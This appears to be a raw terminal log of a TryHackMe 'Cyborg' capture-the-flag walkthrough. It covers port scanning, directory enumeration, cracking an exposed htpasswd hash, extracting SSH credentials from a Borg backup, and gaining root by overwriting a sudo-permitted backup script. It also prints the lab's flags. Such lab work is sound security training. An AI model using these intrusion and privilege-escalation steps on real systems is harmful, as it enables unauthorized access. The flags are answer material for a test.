┌──(kali㉿kali)-[~/Documents/TryHackMe/Cyborg]
└─$ nmap -sC -sV 10.10.50.58 -oN nmap 
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-05 10:13 EST
Nmap scan report for 10.10.50.58
Host is up (0.12s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE    SERVICE        VERSION
22/tcp   open     ssh            OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
|   256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
|_  256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519)
80/tcp   open     http           Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
3369/tcp filtered satvid-datalnk
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.95 seconds

┌──(kali㉿kali)-[~/Documents/TryHackMe/RootMe]
└─$ gobuster dir -u http://10.10.50.58/ -w /usr/share/dirb/wordlists/common.txt -o gobuster
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.50.58/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/12/05 10:14:53 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 276]
/.htaccess            (Status: 403) [Size: 276]
/.htpasswd            (Status: 403) [Size: 276]
/admin                (Status: 301) [Size: 310] [--> http://10.10.50.58/admin/]
/etc                  (Status: 301) [Size: 308] [--> http://10.10.50.58/etc/]  [[B^[[B^[[B
/index.html           (Status: 200) [Size: 11321]                              
/server-status        (Status: 403) [Size: 276]                                
                                                                               
===============================================================
2021/12/05 10:15:09 Finished
===============================================================

# Let's check /etc

Index of /etc
[ICO]	Name	Last modified	Size	Description
[PARENTDIR]	Parent Directory	 	- 	 
[DIR]	squid/	2020-12-30 02:09 	- 	 
Apache/2.4.18 (Ubuntu) Server at 10.10.50.58 Port 80

Index of /etc/squid
[ICO]	Name	Last modified	Size	Description
[PARENTDIR]	Parent Directory	 	- 	 
[ ]	passwd	2020-12-30 02:09 	52 	 
[ ]	squid.conf	2020-12-30 02:09 	258 	 
Apache/2.4.18 (Ubuntu) Server at 10.10.50.58 Port 80

music_archive:$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.

# Save hash as passwd.hash

┌──(kali㉿kali)-[~/Documents/TryHackMe/Cyborg]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt passwd.hash    
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
squidward        (?)     
1g 0:00:00:00 DONE (2021-12-05 10:17) 4.000g/s 155904p/s 155904c/s 155904C/s 112806..samantha5
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

# Download archive.tar and extract contents

┌──(kali㉿kali)-[~/Documents/TryHackMe/Cyborg]
└─$ mv ~/Downloads/archive.tar archive.tar
                                               
┌──(kali㉿kali)-[~/Documents/TryHackMe/Cyborg]
└─$ ls
archive.tar  nmap  passwd.hash

┌──(kali㉿kali)-[~/Documents/TryHackMe/Cyborg]
└─$ tar -xf archive.tar
                                               
┌──(kali㉿kali)-[~/Documents/TryHackMe/Cyborg]
└─$ ls
archive.tar  home  nmap  passwd.hash

┌──(kali㉿kali)-[~/Documents/TryHackMe/Cyborg]
└─$ tree home               
home
└── field
    └── dev
        └── final_archive
            ├── config
            ├── data
            │   └── 0
            │       ├── 1
            │       ├── 3
            │       ├── 4
            │       └── 5
            ├── hints.5
            ├── index.5
            ├── integrity.5
            ├── nonce
            └── README

5 directories, 10 files
                                          
┌──(kali㉿kali)-[~/Documents/TryHackMe/Cyborg]
└─$ cat home/field/dev/final_archive/README 
This is a Borg Backup repository.
See https://borgbackup.readthedocs.io/

┌──(kali㉿kali)-[~/Documents/TryHackMe/Cyborg]
└─$ sudo apt install borgbackup
                                       
┌──(kali㉿kali)-[~/Documents/TryHackMe/Cyborg]
└─$ cd home/field/dev                      


┌──(kali㉿kali)-[~/…/Cyborg/home/field/dev]
└─$ borg list final_archive
Enter passphrase for key /home/kali/Documents/TryHackMe/Cyborg/home/field/dev/final_archive: 
music_archive                        Tue, 2020-12-29 09:00:38 [f789ddb6b0ec108d130d16adebf5713c29faf19c44cad5e1eeb8ba37277b1c82]

┌──(kali㉿kali)-[~/…/Cyborg/home/field/dev]
└─$ tree music_Archive
music_Archive [error opening dir]

0 directories, 0 files
                                       
┌──(kali㉿kali)-[~/…/Cyborg/home/field/dev]
└─$ borg list final_archive::music_archive
Enter passphrase for key /home/kali/Documents/TryHackMe/Cyborg/home/field/dev/final_archive: 
drwxr-xr-x alex   alex          0 Tue, 2020-12-29 08:55:52 home/alex
-rw-r--r-- alex   alex       3637 Mon, 2020-12-28 09:25:14 home/alex/.bashrc
-rw-r--r-- alex   alex        220 Mon, 2020-12-28 09:25:14 home/alex/.bash_logout
-rw-r--r-- alex   alex        675 Mon, 2020-12-28 09:25:14 home/alex/.profile
drwxrwxr-x alex   alex          0 Mon, 2020-12-28 13:00:24 home/alex/Music
-rw------- alex   alex        439 Mon, 2020-12-28 12:26:45 home/alex/.bash_history
drwx------ root   root          0 Mon, 2020-12-28 11:33:47 home/alex/.dbus
drwx------ root   root          0 Mon, 2020-12-28 11:33:47 home/alex/.dbus/session-bus
-rw-r--r-- root   root        464 Mon, 2020-12-28 11:33:47 home/alex/.dbus/session-bus/c707f46991feb1ed17e415e15fe9cdae-0
drwx------ root   root          0 Mon, 2020-12-28 11:33:49 home/alex/.config
drwx------ root   root          0 Mon, 2020-12-28 11:33:49 home/alex/.config/sublime-text-3
drwx------ root   root          0 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/ActionScript
-rw-r--r-- root   root       7046 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/ActionScript/ActionScript.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/AppleScript
-rw-r--r-- root   root       8934 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/AppleScript/AppleScript.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/ASP
-rw-r--r-- root   root       7254 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/ASP/ASP.sublime-syntax.cache
-rw-r--r-- root   root        640 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/ASP/HTML-ASP.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Batch File
-rw-r--r-- root   root       4850 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Batch File/Batch File.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/C#
-rw-r--r-- root   root        604 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/C#/Build.sublime-syntax.cache
-rw-r--r-- root   root      17237 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/C#/C#.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/C++
-rw-r--r-- root   root      11817 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/C++/C.sublime-syntax.cache
-rw-r--r-- root   root      15283 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/C++/C++.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Clojure
-rw-r--r-- root   root       2814 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Clojure/Clojure.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/CSS
-rw-r--r-- root   root      17947 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/CSS/CSS.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/D
-rw-r--r-- root   root      18692 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/D/D.sublime-syntax.cache
-rw-r--r-- root   root        287 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/D/DMD Output.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Diff
-rw-r--r-- root   root        806 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Diff/Diff.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Erlang
-rw-r--r-- root   root       5881 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Erlang/Erlang.sublime-syntax.cache
-rw-r--r-- root   root        257 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Erlang/HTML (Erlang).sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats
-rw-r--r-- root   root       1607 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats/Git Attributes.sublime-syntax.cache
-rw-r--r-- root   root       3096 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats/Git Commit.sublime-syntax.cache
-rw-r--r-- root   root       1314 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats/Git Common.sublime-syntax.cache
-rw-r--r-- root   root       1911 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats/Git Config.sublime-syntax.cache
-rw-r--r-- root   root        328 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats/Git Ignore.sublime-syntax.cache
-rw-r--r-- root   root        742 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats/Git Link.sublime-syntax.cache
-rw-r--r-- root   root        473 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats/Git Log.sublime-syntax.cache
-rw-r--r-- root   root       1342 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats/Git Rebase.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Go
-rw-r--r-- root   root       7366 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Go/Go.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Graphviz
-rw-r--r-- root   root       1506 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Graphviz/DOT.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Groovy
-rw-r--r-- root   root       5574 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Groovy/Groovy.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Haskell
-rw-r--r-- root   root       2859 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Haskell/Haskell.sublime-syntax.cache
-rw-r--r-- root   root        588 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Haskell/Literate Haskell.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/HTML
-rw-r--r-- root   root       5979 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/HTML/HTML.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Java
-rw-r--r-- root   root       9275 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Java/Java.sublime-syntax.cache
-rw-r--r-- root   root        909 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Java/Java Server Pages (JSP).sublime-syntax.cache
-rw-r--r-- root   root       1661 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Java/JavaDoc.sublime-syntax.cache
-rw-r--r-- root   root        575 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Java/JavaProperties.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/JavaScript
-rw-r--r-- root   root      16252 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/JavaScript/JavaScript.sublime-syntax.cache
-rw-r--r-- root   root       1561 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/JavaScript/JSON.sublime-syntax.cache
-rw-r--r-- root   root       1294 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/JavaScript/Regular Expressions (JavaScript).sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/LaTeX
-rw-r--r-- root   root       1079 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/LaTeX/Bibtex.sublime-syntax.cache
-rw-r--r-- root   root      10203 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/LaTeX/LaTeX.sublime-syntax.cache
-rw-r--r-- root   root        668 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/LaTeX/LaTeX Log.sublime-syntax.cache
-rw-r--r-- root   root       1788 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/LaTeX/TeX.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Lisp
-rw-r--r-- root   root       5115 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Lisp/Lisp.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Lua
-rw-r--r-- root   root       5353 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Lua/Lua.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Makefile
-rw-r--r-- root   root        234 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Makefile/Make Output.sublime-syntax.cache
-rw-r--r-- root   root       4762 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Makefile/Makefile.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Markdown
-rw-r--r-- root   root      11172 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Markdown/Markdown.sublime-syntax.cache
-rw-r--r-- root   root        393 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Markdown/MultiMarkdown.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Matlab
-rw-r--r-- root   root      26157 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Matlab/Matlab.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Objective-C
-rw-r--r-- root   root      25087 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Objective-C/Objective-C.sublime-syntax.cache
-rw-r--r-- root   root      15819 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Objective-C/Objective-C++.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/OCaml
-rw-r--r-- root   root        430 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/OCaml/camlp4.sublime-syntax.cache
-rw-r--r-- root   root       6237 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/OCaml/OCaml.sublime-syntax.cache
-rw-r--r-- root   root       1659 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/OCaml/OCamllex.sublime-syntax.cache
-rw-r--r-- root   root       1623 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/OCaml/OCamlyacc.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Pascal
-rw-r--r-- root   root       1171 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Pascal/Pascal.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Perl
-rw-r--r-- root   root       8858 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/Perl/Perl.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/PHP
-rw-r--r-- root   root        447 Mon, 2020-12-28 11:33:47 home/alex/.config/sublime-text-3/Cache/PHP/PHP.sublime-syntax.cache
-rw-r--r-- root   root      32165 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/PHP/PHP Source.sublime-syntax.cache
-rw-r--r-- root   root       1248 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/PHP/Regular Expressions (PHP).sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/Python
-rw-r--r-- root   root      17292 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/Python/Python.sublime-syntax.cache
-rw-r--r-- root   root       1130 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/Python/Regular Expressions (Python).sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/R
-rw-r--r-- root   root      14814 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/R/R.sublime-syntax.cache
-rw-r--r-- root   root        219 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/R/R Console.sublime-syntax.cache
-rw-r--r-- root   root       1177 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/R/Rd (R Documentation).sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/Rails
-rw-r--r-- root   root        427 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/Rails/HTML (Rails).sublime-syntax.cache
-rw-r--r-- root   root        388 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/Rails/JavaScript (Rails).sublime-syntax.cache
-rw-r--r-- root   root        985 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/Rails/Ruby Haml.sublime-syntax.cache
-rw-r--r-- root   root       1486 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/Rails/Ruby on Rails.sublime-syntax.cache
-rw-r--r-- root   root        304 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/Rails/SQL (Rails).sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/Regular Expressions
-rw-r--r-- root   root       2985 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/Regular Expressions/RegExp.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/RestructuredText
-rw-r--r-- root   root       1611 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/RestructuredText/reStructuredText.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/Ruby
-rw-r--r-- root   root       9901 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/Ruby/Ruby.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/Rust
-rw-r--r-- root   root        228 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/Rust/Cargo.sublime-syntax.cache
-rw-r--r-- root   root       8561 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/Rust/Rust.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/Scala
-rw-r--r-- root   root      13481 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/Scala/Scala.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/ShellScript
-rw-r--r-- root   root      10255 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/ShellScript/Bash.sublime-syntax.cache
-rw-r--r-- root   root       7668 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/ShellScript/commands-builtin-shell-bash.sublime-syntax.cache
-rw-r--r-- root   root        158 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/ShellScript/Shell-Unix-Generic.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/SQL
-rw-r--r-- root   root       2724 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/SQL/SQL.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/TCL
-rw-r--r-- root   root       1010 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/TCL/HTML (Tcl).sublime-syntax.cache
-rw-r--r-- root   root       4120 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/TCL/Tcl.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:49 home/alex/.config/sublime-text-3/Cache/Text
-rw-r--r-- root   root         92 Mon, 2020-12-28 11:33:49 home/alex/.config/sublime-text-3/Cache/Text/Plain text.tmLanguage.cache
-rw-r--r-- root   root         43 Mon, 2020-12-28 11:33:49 home/alex/.config/sublime-text-3/Cache/Text/Plain text.tmLanguage.rcache
drwx------ root   root          0 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/Textile
-rw-r--r-- root   root       1783 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/Textile/Textile.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/XML
-rw-r--r-- root   root       2344 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/XML/XML.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/YAML
-rw-r--r-- root   root       3850 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/YAML/YAML.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/Default
-rw-r--r-- root   root       4086 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/Default/Syntax Summary.cache
-rw-r--r-- root   root      10895 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/Default/Meta Info Summary.cache
-rw-r--r-- root   root    1003914 Mon, 2020-12-28 11:33:48 home/alex/.config/sublime-text-3/Cache/Default/Startup.cache
drwx------ root   root          0 Mon, 2020-12-28 11:33:49 home/alex/.config/sublime-text-3/Packages
drwx------ root   root          0 Mon, 2020-12-28 11:33:49 home/alex/.config/sublime-text-3/Packages/User
drwx------ root   root          0 Mon, 2020-12-28 11:38:24 home/alex/.config/sublime-text-3/Local
-rw-r--r-- root   root       5199 Mon, 2020-12-28 11:38:24 home/alex/.config/sublime-text-3/Local/Auto Save Session.sublime_session
drwx------ root   root          0 Mon, 2020-12-28 11:33:49 home/alex/.config/sublime-text-3/Lib
drwx------ root   root          0 Mon, 2020-12-28 11:33:49 home/alex/.config/sublime-text-3/Lib/python3.3
drwx------ root   root          0 Mon, 2020-12-28 11:33:49 home/alex/.config/sublime-text-3/Installed Packages
drwx------ root   root          0 Mon, 2020-12-28 11:33:49 home/alex/.config/ibus
drwx------ root   root          0 Mon, 2020-12-28 11:33:49 home/alex/.config/ibus/bus
drwxrwxr-x alex   alex          0 Tue, 2020-12-29 08:55:52 home/alex/Documents
-rw-r--r-- root   root        110 Tue, 2020-12-29 08:55:41 home/alex/Documents/note.txt
drwxrwxr-x alex   alex          0 Mon, 2020-12-28 12:59:30 home/alex/Public
drwxrwxr-x alex   alex          0 Mon, 2020-12-28 12:59:37 home/alex/Videos
drwxrwxr-x alex   alex          0 Tue, 2020-12-29 08:57:14 home/alex/Desktop
-rw-r--r-- root   root         71 Tue, 2020-12-29 08:57:14 home/alex/Desktop/secret.txt
drwxrwxr-x alex   alex          0 Mon, 2020-12-28 12:59:57 home/alex/Downloads
drwxrwxr-x alex   alex          0 Mon, 2020-12-28 13:00:02 home/alex/Templates
drwxrwxr-x alex   alex          0 Mon, 2020-12-28 13:26:44 home/alex/Pictures
                                 
┌──(kali㉿kali)-[~/…/Cyborg/home/field/dev]
└─$ tree home         
home [error opening dir]

0 directories, 0 files
                                 
┌──(kali㉿kali)-[~/…/Cyborg/home/field/dev]
└─$ borg extract final_archive::music_archive
Enter passphrase for key /home/kali/Documents/TryHackMe/Cyborg/home/field/dev/final_archive: 
Enter passphrase for key /home/kali/Documents/TryHackMe/Cyborg/home/field/dev/final_archive: 
                                     
┌──(kali㉿kali)-[~/…/Cyborg/home/field/dev]
└─$ tree home
home
└── alex
    ├── Desktop
    │   └── secret.txt
    ├── Documents
    │   └── note.txt
    ├── Downloads
    ├── Music
    ├── Pictures
    ├── Public
    ├── Templates
    └── Videos

9 directories, 2 files
                                             
┌──(kali㉿kali)-[~/…/Cyborg/home/field/dev]
└─$ cat home/alex/Desktop/secret.txt       
shoutout to all the people who have gotten to this stage whoop whoop!"
                                           
┌──(kali㉿kali)-[~/…/Cyborg/home/field/dev]
└─$ cat home/alex/Documents/note.txt 
Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!

alex:S3cretP@s3
                            
┌──(kali㉿kali)-[~/…/Cyborg/home/field/dev]
└─$ ssh alex@10.10.50.58         
alex@10.10.50.58's password: 
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.15.0-128-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


27 packages can be updated.
0 updates are security updates.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

alex@ubuntu:~$ ls
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  user.txt  Videos
alex@ubuntu:~$ cat user.txt
flag{1_hop3_y0u_ke3p_th3_arch1v3s_saf3}
alex@ubuntu:~$ sudo -l
Matching Defaults entries for alex on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alex may run the following commands on ubuntu:
    (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh
alex@ubuntu:~$ ls -l /etc/mp3backups/backup.sh
-r-xr-xr-- 1 alex alex 1083 Dec 30  2020 /etc/mp3backups/backup.sh
alex@ubuntu:~$ cd /etc/mp3backups/
alex@ubuntu:/etc/mp3backups$ echo "/bin/bash" > backup.sh
alex@ubuntu:/etc/mp3backups$ chmod 777 backup.sh
alex@ubuntu:/etc/mp3backups$ sudo /etc/mp3backups/backup.sh
root@ubuntu:/etc/mp3backups# whoami
root
root@ubuntu:/etc/mp3backups# pwd
/etc/mp3backups
root@ubuntu:/etc/mp3backups# cd ../../..
root@ubuntu:/# ls
bin  boot  cdrom  dev  etc  home  initrd.img  initrd.img.old  lib  lib64  lost+found  media  mnt  opt  proc  root  run  sbin  snap  srv  sys  tmp  usr  var  vmlinuz  vmlinuz.old
root@ubuntu:/# cd root
root@ubuntu:/root# ls
root.txt
root@ubuntu:/root# cat root.txt
flag{Than5s_f0r_play1ng_H0p£_y0u_enJ053d}